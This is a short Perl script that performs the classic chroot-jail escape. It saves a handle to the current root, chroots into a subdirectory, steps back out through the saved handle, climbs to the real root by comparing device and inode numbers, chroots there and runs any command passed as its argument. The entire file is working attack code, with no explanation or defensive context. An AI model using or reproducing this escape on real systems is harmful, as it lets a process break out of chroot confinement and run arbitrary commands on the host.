#!/usr/bin/perl -w

chdir "/";
opendir JAILROOT, "." or die "file handle err\n";
mkdir "mysubdir";
chdir "mysubdir";
chroot ".";
chdir(*JAILROOT);
while ((stat("."))[0] != (stat(".."))[0] or (stat("."))[1] != (stat(".."))[1]) {
        chdir "..";
}
chroot ".";
print `$ARGV[0]`
